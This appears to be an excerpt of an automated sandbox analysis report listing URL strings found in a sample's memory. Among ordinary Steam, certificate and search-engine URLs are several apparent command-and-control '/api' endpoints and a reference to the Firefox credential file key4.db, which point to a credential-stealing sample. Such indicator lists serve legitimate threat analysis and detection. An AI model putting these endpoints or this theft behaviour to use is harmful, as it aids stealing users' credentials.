            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
            Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
            Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: file.exe, 00000000.00000003.1752865199.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719628135.0000000005BF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
            Source: file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a61
            Source: file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
            Source: file.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bathdoomgaz.store:443/apibcryptPrimitives.dll(
            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
            Source: file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719628135.0000000005BF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: file.exe, 00000000.00000003.1690697919.000000000128B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
            Source: file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719628135.0000000005BF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719628135.0000000005BF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
            Source: file.exe, file.exe, 00000000.00000003.1690568055.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1852469176.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700772120.0000000001265000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690697919.0000000001265000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.0000000001263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clearancek.site/api
            Source: file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clearancek.site:443/api
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/
            Source: file.exe, 00000000.00000003.1690568055.0000000001248000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/css/applications/community/main.css?v=DVae4t4RZiHA&l=en
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/css/globalv2.css?v=dQy8Omh4p9PH&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/css/promo/summer2017/stickers.css?v=P8gOPraCSjV6&l=engl
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/css/skin_1/header.css?v=pTvrRy1pm52p&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/css/skin_1/profilev2.css?v=t9xiI4DlPpEB&l=english
            Source: file.exe, 00000000.00000003.1690568055.0000000001248000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
            Source: file.exe, 00000000.00000003.1690568055.0000000001248000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/libraries~b28b7af69.js?v=
            Source: file.exe, 00000000.00000003.1690568055.0000000001248000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/main.js?v=4XouecKy8sZy&am
            Source: file.exe, 00000000.00000003.1690568055.0000000001248000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/manifest.js?v=r7a4-LYcQOj
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/global.js?v=7qlUmHSJhPRN&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/modalContent.js?v=XpCpvP7feUoO&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/profile.js?v=bbs9uq0gqJ-H&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/promo/stickers.js?v=W8NP8aTVqtms&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&l=
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/javascript/webui/clientcom.js?v=jq1jQyX1843y&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/css/buttons.css?v=-WV9f1LdxEjq&l=english
            Source: file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/css/motiva_sans.css?v=v7XTmVzbLV33&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/css/shared_global.css?v=uF6G1wyNU-4c&l=english
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/css/shared_responsive.css?v=kR9MtmbWSZEp&l=engli
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/header_logo.png
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&l=engl
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/javascript/shared_global.js?v=7glT1n_nkVCs&l=eng
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunf
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
            Source: file.exe, 00000000.00000002.1852469176.0000000001281000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.0000000001271000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cosergei-esenin.comsergei-esenin.comty/public/assets/
            Source: file.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dissapoiznw.store:443/api
            Source: file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
            Source: file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://licendfilteo.site:443/api
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
            Source: file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobbipenju.store:443/api
            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
            Source: file.exe, file.exe, 00000000.00000003.1850629516.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700772120.000000000128B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1851091044.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1853087164.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700849717.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
            Source: file.exe, 00000000.00000003.1850629516.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1851091044.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1853087164.00000000012DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/BK
            Source: file.exe, 00000000.00000003.1700849717.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
            Source: file.exe, 00000000.00000002.1857604053.0000000005BD2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1851374834.0000000005BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api(
            Source: file.exe, 00000000.00000003.1700659896.0000000001248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiHv$
            Source: file.exe, 00000000.00000003.1851345687.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1858209085.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apieP
            Source: file.exe, 00000000.00000003.1851345687.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1858209085.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiwz
            Source: file.exe, 00000000.00000003.1850629516.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1851091044.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1853087164.00000000012DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/k
            Source: file.exe, 00000000.00000003.1700772120.000000000128B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700849717.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/za%
            Source: file.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api
            Source: file.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api4p.default-release/key4.dbPK
            Source: file.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api6
            Source: file.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/apiK
            Source: file.exe, 00000000.00000003.1700659896.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/apih
            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
            Source: file.exe, 00000000.00000003.1690697919.000000000128B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
            Source: file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/U
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
            Source: file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
            Source: file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/p
            Source: file.exe, 00000000.00000003.1690568055.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690697919.0000000001265000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
            Source: file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900&
